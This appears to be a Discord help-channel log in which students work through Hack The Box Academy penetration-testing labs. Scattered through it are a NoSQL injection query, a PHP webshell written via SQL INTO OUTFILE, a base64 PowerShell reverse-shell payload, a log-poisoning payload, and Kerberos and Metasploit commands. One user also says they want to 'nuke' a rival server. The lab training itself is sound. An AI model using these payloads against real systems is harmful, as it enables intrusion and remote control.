I'm extremely stuck on the INTRODUCTION TO NOSQL INJECTION module section "In-Band Data Extraction" please help!

You'll need to enumerate that. Scanning over proxychains can be a little scuffed depending on how you have it set up and what your nmap flags are, so it might be more reliable to do a ping sweep from the internal host to get a better idea.

Did you follow the hint and urlencode your payload?

I have created a golden ticket for the DC01 in the AD Enumeration & Attacks - Skills Assessment Part I and am unable to ls the C$ directory? I have ran klist and Kerberos ticket is in memory

I am getting a cannot find path error

I am working from the MS01 machine in an RDP session

dm you

Hi I. Working on using metasploit framework module and I'm having the message

Exploit Completed but no session was created

How do I fix that
I'm using a Kali Linux virtual machine

I need help please

Which section?

And can you please provide more information

The very first exercise on the Metasploit Framework module

<@&861185840277487616>

Psexec?

Yes

Okay, check out the payload on show options please

I almost thought it was a troll since they talked about myths in the two paragraphs before stating that Einstein was bad at math lol. But I mean, even if it might not be factual, it was still an alright module

Sometimes windows/meterpeter doesn't work, you have to put there x64 payload

some server ripped my friends server off that hes been working really hard on by taking everything hes said and putting it on his own

im trying to nuke the server

🧍‍♂️

I don't care, it's illegal

no its not

its against the rules

How can I do that

but not illegal

I liken it to those "motivational speakers" who just spout a bunch of garbage to make you feel good.

Set payload (here's the payload itself)

https://tenor.com/view/dreams-shia-motivation-dont-let-your-dreams-be-dreams-gif-4777431

@solemn bough read the #rules

I believe it's windows/x64/meterpeter/reverse_tcp

So is that the command to type or what ?

I don't think there's really anything wrong to tell people about the 10000 hour "rule" if it was some sort of private conversation meant to motivate a person, but for a published module it's pretty disappointing.

Can I dm you ?

Yeah

Yeah, I agree

And given the history of stuff like mathematics, using someone like Einstein is basically one of the worst possible examples.

The mathematical field is filled with people who are basically geniuses, and using them as "motivation" is just awful.

John Nash: https://imgur.com/sMqfqU6

Hey guys can anyone please help me on the exploiting think client application module, can not get it to download the sever

You don't want to read about Terence Tao's "advice" for grad school.

https://www.ams.org/about-us/LivingProof.pdf

It starts on page 96.

There's a reddit thread about this: https://www.reddit.com/r/math/comments/c6a5vo/til_that_terence_tao_struggled_to_pass_his

"I struggled on my orals exam for grad school because I spent a lot of time gaming. I decided to cut back on gaming and studied for two weeks. Oh yeah, you should cut me some slack - I was only 21."

I think it's pretty bad to mention Freud in all of this, the founder of "everything is a phallic symbol and we all want to fuck one of our parents"

you're in the right path partly

try other zones

what zones did inlanefreight.htb itself gave you?

but you have other zones also

you've to brute force then

Not every zone allows zonetransfer from everyone

for instance app.domain doesn't allow zone transfer

but internal.domain allows

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

@vital adder could you help me with this module please, been at it for days

hi guys i have a realy duumb question im editing the nginx config for the reverse proxy and AJP. it says coment out the server block in the nginx.conf file but i'm after confusing myself and not sure what they mean by block and where edit the config. by block do they mean everything that is between the brackets {} with the server title and do i just add the upstream tomacts and the 8080 server within the http {}

Can someone that's done the broken auth skill assessment confirm something for me? i'm like 99% positive I've got the correct cookie but everytime I enter it in Dev tools and refresh i get user cannot have requested role and through burp it just gets sanitized and replaced with the original cookie if i try that way.

? through burp repeater ?

Can someone that's done the broken auth skill assessment confirm something for me? i'm like 99% positive I've got the correct cookie but everytime I enter it in Dev tools and refresh i get user cannot have requested role and through burp it just gets sanitized and replaced with the original cookie if i try that way.

Can someone that's done the broken auth skill assessment confirm something for me? i'm like 99% positive I've got the correct cookie but everytime I enter it in Dev tools and refresh i get user cannot have requested role and through burp it just gets sanitized and replaced with the original cookie if i try that way. 😄

Im confused is asking for confirmation not a question

Sorry, before I wrote my message, I had obviously copied your message and pasted that. 🤣

This is what happens when you press around on your cell phone with sausage fingers 🤣🤣

Send me the username and role and i have a look at it

Guys any help in the windows logs mini module in the part of Get-WinEvent exercice i'm stuck

sure shoot me a dm if you still need help

#!/bin/bash

Count number of characters in a variable:

echo $variable | wc -c

Variable to encode

var="nef892na9s1p9asn2aJs71nIsm"
counter=0
for counter in {1..40}
do
var=$(echo "$var" | base64)
done
if [ $counter -eq 35 ]
then
echo $var | wc -c
fi

Hello guys can any of you help me with this exercise of the bash scripting module, a hint or something to give some light would be helpful, becasue I don't understand why it tells me that there is an error in the code that was actually given by the academy in the line of the for loop is says illegal number on the range and I don't get it, I also check the code in shellcheck.net and it doesn't say that there are any mistakes

Thank you in advance!

could you put the "if" statement inside the for loop?

I tried that first but then it said expected do as the error

do it one more time with proper intendation

in any case this is something you want to use:
https://www.shellcheck.net/

Ok I will try and let you know, thanks for answering!!

Yeah i used shellcheck but in there all was good😅

outside the for loop the "counter" will hold the value 40, put the "if" statement inside and dm me in case you have further problems with the script

does anyone have any expierence with this error?

im on AD attacks and enumeration

Ok I'm on it now, thanks a lot!! Will do

I think if the user is unsure about http-server and npm being connected they could just do a locate http-server | grep npm displaying the paths where http-server is located and filtering them to know if they are linked with npm.. it should provide with some results given that as any npm package, http-server should have a file named ".npmignore" too, so the grep will display those.. from that the user will see that http-server is a subdirectory of "node_modules".. so I think that would be reasonable to consider as a connection, thus being sure that http-server is indeed the command you are expected to provide in your answer

I did it via RDP however something you can try is to load the script directly in memory with the -s option along with the script file path where you have stored the script in your local machine. Look the man page evil-winrm -h

thats the evil-winrm flag?

ok

look the man page

ill try that

I'm on the nmap module and at the bottom I have the question: + 1 Find all TCP ports on your target. Submit the total number of found TCP ports as the answer. However none of the scans I try return anything promising. Did I miss something?

@rustic sage 'Host and Port Scanning'

is the one I'm on.

when I use nc with proxychains what IP should I use?

I'm not sure myself, but the command you've provided listens on 0.0.0.0 by default. So, I believe your primary IP assigned should work.

Like an usual nc command or it'll fail trying to route.
You can give it a try and see what happens

catching connections?

it doesn't

I started the nc in the bridge machine

to get the revshell

The done command should be at the end of the control structure in your script

Think about it this way, how does the bridge machine know how to get back to your host?

Yeah, it's failing trying to route.
Btw, curious. Why are you running proxychains on nc?

but idk how to do it with my machine

I used 10.10.x.x for the revshell

maybe I can start a revshell in the bridge

but does that machine actually know where 10.10.x.x is?

and from there start a nc to my vm

the bridge yea

oh I meant the actual machine you're going after, I'm assuming the setup is something like

ATTACKER (10.10.x.x) <---> BRIDGE (10.10.x.x/172.16.x.x) <---> OTHER_BOX (172.16.x.x)

that box on the internal network just does not know where a 10.10.x.x IP will be because it's not configured to know where that is

the if condition in your script checks whether it is equal to 35 after the loop ends
To fix it -
var=$(echo "$var" | base64)
if [ $counter -eq 35 ]
then
echo $var | wc -c
fi
done

I understand u, I will just do it setting the nc in the bridge then.

If you wanted a reverse shell to go all the way back to your box, you'd need something running on the Bridge/Jump box to tunnel traffic between the two, like socat.

I had socat at the beginning

yesterday, but I just saved the .ssh from the root

to continue today and do it faster

Just to be clear, I'm not saying to catch the reverse shell with socat, socat can specifically be used to explicitly forward traffic from one port to another IP and port

yea it makes a tunnel

like ligolo-ng

Yes I did, for example…

ipaddress:port/?q=%7B%22name%22%3A%7B%22%24ne%22%3A%22doesntExist%22%7D%7D
Ive tried every command provided in the section

Hey everyone, I am stuck on the Getting Started Knowledge Check. For some reason the metasploit module return failed to retrieve nonce and I've now spent almost an hour trying to decipher the code and why this happens to no avail. Is this some bug on the box or I am being misdirected?

Hey someone do the KEREBEROS ATTACKS module and coplete the Unconstrained Delegation questions? having hard time with the second question

ty I got system in the other machine as well

@rustic sage no

Check out then say

i did

and still no

It has nothing to do with HTB Academy modules. Authenticate with the bot, then you will have more relevant channels you can post in

@surreal rain ok😐

@surreal rain how i can get the hackthebox roles

#welcome

@novel matrix how i get roles of hackthebox

verify in the bot commands channel: /identify with the api token on your profile page

anybody understand bash im getting syntax error nearunexpected token '>' i have tried in the terminal and i have put it in a file called script.sh and gave it 777 ran ./script.sh ans same error.

i cant actualy past the function here tho 😂

its 4 keys

@vocal tusk show the code

i cant paste it some form of mystical protection

and cant post screenshot fo it either

https://academy.hackthebox.com/module/145/section/1298

at verry end the bash script for automation its litteraly copy and paste job and wont work

Has anyone completed the CrackMapExec Skills Assessment? I could use a hand with the 3rd question regarding DEV01. Fully pwned SQL01 and have a number of creds, including the one I believe should lead to pwning the DEV box, but I must be missing something and a second pair of eyes would be great. Thanks!

@vocal tusk tell me about script i will give t

What you want from script

i sent you dm with script

it just wont work its uspposed to encode the command and pass it to server with curl command so i can use special charaters

@vocal tusk ok

Read and follow #welcome
After the verification of your user, you can upload images

Check the creds you found against the SMB on DC01.

Check out the rights

thank you i will now

Footprinting Lab - Hard, I’m getting an invalid format for Tom after copying the OpenSSH Private key over. When trying to connect via ssh I’m getting an invalid format and permission denied (publickey). Help anyone?

Try it as shown in the previous lesson

I took advantage of the write perm to land a callback and cracked it but doesn't seem to lead me into the DEV box.

Do you have the creds from user j***

Yep.

Check ||Group Managed Service Accounts||

hi everyone im having a problem with network enumeration with nmap

in the last one

What kind of problem do you have?

im trying to do Firewall and IDS/IPS Evasion - Hard Lab but when i try to scan it with different firewall evasion flags that i lernt before i cant see the required port in only see 2 of them

make sure you didn't miss any lines or copied extra new-lines or these kinda things. if it keeps failing feel free to dm me and I'll take a closer look

So gys what you are doing

i think i broke it it just says please wait for the last half hour almost after i followed steps 😂

Waiting is good. Drink coffee or tea 🤣

Or ask a moderator/administrator

il try turning it off and on again 😂

Im trying no dns resolution, no ICMP ping, ACK scan and custom source port but i cant see the port with the service version required

The module shows you another possibility instead of nmap. Try it with this.

this means I cannot use it for rdp?

ill try! thx!

yes dont bother, only way i managed to maintain a system shell over that was through the exploit

should have enough information to pivot to the next host if you have already obtain admin hash

just wondering where i would add the payload in this command SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE

is the <?php echo shell_exec($_GET['c']);?> bit the payload

cuz i need to add base64 and idk where it goes

someone know how to delete the data from bloodhound?

Left Down there are 4 button. Clear database, Refresh stats etc.

yea ty

There should be some kind of settings to auto-delete upon closing the app cuz it's getting annoying everytime

getting Parse error: syntax error, unexpected 'JABjAGwAaQBlAG4AdAAgAD0AIABOAG' (T_STRING), expecting ')' in C:\xampp\htdocs\webshells.php on when trying to get a shell

this is what i entered to make the webshell SELECT "<?php echo shell_exec(powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==);?>" INTO OUTFILE 'c://xampp/htdocs/webshells.php';

The web server is running PHP.
Just write the webshell into the webroot and call it.
It does not need a powershell

is there a way to force use my keyboard?

is annoying sometimes when u connect to the target and my keys are in a different place and instead of writing / it writes &

You can change the language to your own language
Then the keyboard should be right again

I have put the shell in a folder on the website using SQLi but I cannot seem to run the php code

I put it in /tmp/ named /shell.php

how do i run it from there? I dont have access to upload a file to /var/www/html

in /tmp actually never runs a web server and therefore no PHP can be executed there.

Where should i put it then

I think /etc works aswell but idk how to get it to execute on the server

No, you always have to write a webshell into the directory where the webserver runs

Anyone ever run into this error on Crackmapexec (Module: Using Crackmapexec)

But I dont have permission xd

etc is certainly also wrong
Probably /var/.../...

Hi, I am trying to finish the Security Monitoring & SIEM Fundamentals module and in the second question of the SIEM Visualization Example 2 section I am unable to answer it. I have looked all over the Elastic Stack and the answers I provide do not work. It would be greatly appreciated if someone could shed some light on the issue. This is the last question I have left to answer. Thank you very much !

having trouble setting up the reverse shell

ive got a web shell

but when i use a powershell 3 base64 payload i get this

Yes it is, but I dont have permissions to upload a file there

did you url encode the payload?

i dont think so lol

how would i do that?

like just need to replace the spaces with + in this case.

oh

powershell+-e+<base64>

or %20

still not getting the shell

even after encoding

Help, I am stuck on the Skill Assessment in SQL injections fundamentals

It is being an amazing the module attacking network enterprises

Are you still getting the same help menu output from powershell?

no

I guess the command got executed, have your listening IP and ports verfied once again.

both on the listener and on the payload.

You don't give 0.0.0.0 in the payload. It's kinda of like a default route that sends traffic to itsef in this case.

do i need to add my local ip?

You need to specify the ip address of your HTB VPN Interface which would be the tunX IP.

your ip assigned through academy vpn.

ohh

thanks

idk why i didnt need to change that last time but at least i know now

Module: Attacking Common Applications
Section: Gitlab - Discovery & Enumeration

I have found gitlab's version but it doesn't work when I submit it. I got the same ||13.10|| with/without registration so I think something is not right here.

stuck on ad enumeration/dcsync section. i'm trying to use getuserspns_windows.exe but it keeps saying that i am providing it too few arguments. here is my command. PS C:\Tools> .\GetUserSPNs_windows.exe -target-domain INLANEFREIGHT.LOCAL -dc-ip 172.16.5.5 -request-user INLANEFREIGHT\syncron -request. what am i missing? hard time finding an example online

do yall have braindamage?

like fr?

what would safer:
start a smbserver from my vm or use xfreerdp /drive

I wonder can we host an smbserver on a kubernates ssl nft ?

ngl they could've just went to thm instead and be hand holded to top 0.00001%

safer or reliable?
xfreerdp is safer and smbserver is reliable

https://tenor.com/bgUiv.gif

safer, in case they notice. which one of them would be better to protect my files

anyone can hel me with LFI module with the final task? "Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer."

what hav u tried

i found the admin panel and i try poisoning log, but didn't work

Irc, when you mount a drive through xfreerdp, only you can see it. Even if someone had a session on the machine, they wouldn't be able to see your drive mounted.

oh I thought anyone could use it

I stopped doing thm at top 0.069%

checking 'net use'

i barely use thm and i'm like 5%, makes u wonder what the other 95% of people are doing

I am top 0.1% and I just used it for 1 month

can anyone help me?

https://tenor.com/view/patrick-star-dumb-gif-20952040

youre on the correct path. you just need to keep trying and thinking about your payloads

remember the issues with log poisoning is you can brick the page. So if you have a bad payload you basically have to reset the lab

you can also read the error.log to see the error message for your payload

i used <?php system($_GET["cmd"]); ?> in user agent

Its a skill assessment, Ive given all the tips I can for it

you must ultimately pass this challenge yourself

Take a look at the log file.

i found access.log

is there any reason the medium lab for attacking common services is infinitely easier than the easy lab?

my log poisoning didn't work 😭

yesh

Caugh caugh (Skill assessment - SQLi)

Ive been stuck for 2 hours

I cant find the file I am supposed to upload the thing to

me too, but with the final LFI task

Take a close look at the logfile and then consider what happens if you use your payload the way you do.

F, but its so hard to find the place I can execute the code

Hi guys, i'm stucked at the burp intruder question on using web proxies, I'mm supposed to fuzz the target on admin directory with appending the .html. Just wanna know if i'm in the right path here

Q:Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag

Without looking at my notes now. The path looks good, but remember that your list must have .html with each entry.

Depending on the list it is better to define the file extension here in burp

try the shortest lists first

return error 404 when i use the payload

I append a suffix .html but i'm really not used to fuzzing. So i dont know if the problem is to wait to run all the worlist or if my request is wrong

Then something is wrong anyway.
Look at the chapter again, look at the logfile and think about why your payload does not work

read what I told

I know. I gave you advice on how you can debug it.

As I said, it depends on your list.
The important thing is that you scan for html files.
like this:
||/admin/abc123.html||

idk shortest is shortest lol

which one is shorter the mutated list or the default list

i try everything, but i couldn't do this task

I'm using the one suggested in the exercise, by seeing your example i believe the request is right

wait time

Look at the ||quotation marks||

"-" "

Then you should change your strategy 😉

cause u want

I told u 4 times already to use the shortest list

the module gives the wordlists

There's nothing wrong with that either.

Even with this u sent here

rushing through sections/modules is not recommended, understanding the information and the logic behind is recommended

the first comment is from payloadbunny

which says to use the 2 wordlists they give in the section

having notes, and building up them will help you further along the path

u should rest 5 min

and read it again

#boxes left the chat

Are you sure that the user is root?

why u use username list in password

in the forum u sent bunny told to use both list given in the section

. there is 1 list called username.list and other one password.list

How deep of a knowledge do we need to have for SQL? Just to be able to navigate around junior DBA type knowledge

You can never know enough.

I just got Domain Admin in the attacking enterprise networks , but I couldn't do it all blindly